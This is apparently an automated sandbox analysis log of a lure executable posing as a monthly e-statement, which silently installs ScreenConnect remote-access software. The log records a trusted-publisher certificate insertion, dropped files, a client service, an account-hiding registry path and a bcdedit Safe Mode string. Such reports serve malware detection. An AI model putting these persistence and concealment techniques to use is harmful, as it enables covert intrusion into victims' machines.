                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D916000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DB2A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DC3E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2451601548.000000001BEB2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D8E9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DB2A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2447633526.0000000002CA2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D738000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DB2A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DC3E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.2446246290.0000000004CB2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll0.2.dr, ScreenConnect.Core.dll.2.dr
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: ScreenConnect.WindowsBackstageShell.exe.2.drStatic PE information: 0xB80EE04C [Tue Nov 8 12:57:48 2067 UTC]
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_009A1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_009A1000
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: real checksum: 0x1bda6 should be: 0x1d486
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_009A1BC0 push ecx; ret 0_2_009A1BD3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848E2D2A5 pushad ; iretd 2_2_00007FF848E2D2A6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F65FED push es; retf FFFFh2_2_00007FF848F65FEF
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F58E01 push 8B495C96h; iretd 2_2_00007FF848F58E0C
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F47D00 push eax; retf 2_2_00007FF848F47D1D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F58D31 push 8B495C96h; iretd 2_2_00007FF848F58D3C
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F400BD pushad ; iretd 2_2_00007FF848F400C1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F4842E pushad ; ret 2_2_00007FF848F4845D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F4845E push eax; ret 2_2_00007FF848F4846D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F514F8 push E95C9A94h; ret 2_2_00007FF848F51529
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF848F04162 push eax; ret 9_2_00007FF848F04163
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF848F02D68 push eax; ret 9_2_00007FF848F02E7B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF848F02FDA pushad ; retf 9_2_00007FF848F02FDB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF848F03F3A pushad ; retf 9_2_00007FF848F03F3B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF848F000BD pushad ; iretd 9_2_00007FF848F000C1
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF848F030BA push eax; iretd 9_2_00007FF848F030BB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF848F0401A push eax; iretd 9_2_00007FF848F0401B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FF848F100BD pushad ; iretd 12_2_00007FF848F100C1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Core.dllJump to dropped file
                  Source: ScreenConnect.ClientService.dll.2.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.2.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (4b43e651-6d21-48a4-a5c8-8436b8ee48ae)

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2451601548.000000001BEB2000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 0000000A.00000002.2445494046.00000000027A2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000C.00000002.3289162550.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000C.00000002.3288573826.00000000012B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll0.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.Windows.dll.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
